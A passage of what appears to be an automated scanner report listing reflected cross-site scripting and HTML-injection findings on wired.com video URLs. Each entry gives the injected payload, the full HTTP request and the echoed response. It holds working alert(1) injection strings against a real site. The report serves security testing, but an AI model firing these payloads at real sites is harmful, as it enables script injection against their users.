GET /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer33a75"-alert(1)-"b39049b1da7/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:52:43 GMT Date: Mon, 22 Nov 2010 00:48:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cf06"-alert(1)-"a6eea67ae2b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/6762576850012cf06"-alert(1)-"a6eea67ae2b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:53:16 GMT Date: Mon, 22 Nov 2010 00:48:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106690
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5727"><a>51ba763851b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videob5727"><a>51ba763851b/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29452 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:20 GMT Date: Mon, 22 Nov 2010 00:41:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videob5727"><a>51ba763851b ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 204e8--><script>alert(1)</script>7dd883f11fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video204e8--><script>alert(1)</script>7dd883f11fe/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29487 Vary: Accept-Encoding Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:47:08 GMT Date: Mon, 22 Nov 2010 00:42:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video204e8--><script>alert(1)</script>7dd883f11fe/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64f6a"><a>256869a8c00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos64f6a"><a>256869a8c00/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:47:21 GMT Date: Mon, 22 Nov 2010 00:42:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos64f6a"><a>256869a8c00 c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7caa1"-alert(1)-"57600af85d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos7caa1"-alert(1)-"57600af85d9/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:26 GMT Date: Mon, 22 Nov 2010 00:43:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106805
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fbc7"-alert(1)-"fc4917c5a16 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights9fbc7"-alert(1)-"fc4917c5a16/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:49:13 GMT Date: Mon, 22 Nov 2010 00:44:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106832
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af4a6"><a>cc8cfc6cb78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlightsaf4a6"><a>cc8cfc6cb78/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:48:06 GMT Date: Mon, 22 Nov 2010 00:43:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlightsaf4a6"><a>cc8cfc6cb78"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47c96"-alert(1)-"6b39c469add was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/171644057447c96"-alert(1)-"6b39c469add/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:49:50 GMT Date: Mon, 22 Nov 2010 00:44:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76354"-alert(1)-"5b79ff964c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team76354"-alert(1)-"5b79ff964c2/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:07 GMT Date: Mon, 22 Nov 2010 00:45:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... vascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e566d"-alert(1)-"c72dc9190e1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001e566d"-alert(1)-"c72dc9190e1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:15 GMT Date: Mon, 22 Nov 2010 00:45:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106777
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 4d894--><script>alert(1)</script>cea20fcb24e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video4d894--><script>alert(1)</script>cea20fcb24e/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29463 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:19 GMT Date: Mon, 22 Nov 2010 00:46:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video4d894--><script>alert(1)</script>cea20fcb24e/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 201d0"><a>ebd28a3fec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video201d0"><a>ebd28a3fec/latest-videos/highlights/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29426 Vary: Accept-Encoding Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 00:50:32 GMT Date: Mon, 22 Nov 2010 00:45:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video201d0"><a>ebd28a3fec ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62258"-alert(1)-"919fafaaa81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos62258"-alert(1)-"919fafaaa81/highlights/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:26 GMT Date: Mon, 22 Nov 2010 00:47:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52b9d"><a>211a0831db4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos52b9d"><a>211a0831db4/highlights/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:51:12 GMT Date: Mon, 22 Nov 2010 00:46:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos52b9d"><a>211a0831db4 c_highlights"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8141"-alert(1)-"10ca6e21fc9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlightsc8141"-alert(1)-"10ca6e21fc9/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:32 GMT Date: Mon, 22 Nov 2010 00:48:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106717
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f84f6"><a>f02232e9b59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlightsf84f6"><a>f02232e9b59/1716440574/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:34 GMT Date: Mon, 22 Nov 2010 00:47:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106774
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlightsf84f6"><a>f02232e9b59"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68f9c"-alert(1)-"1deb7ddd208 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
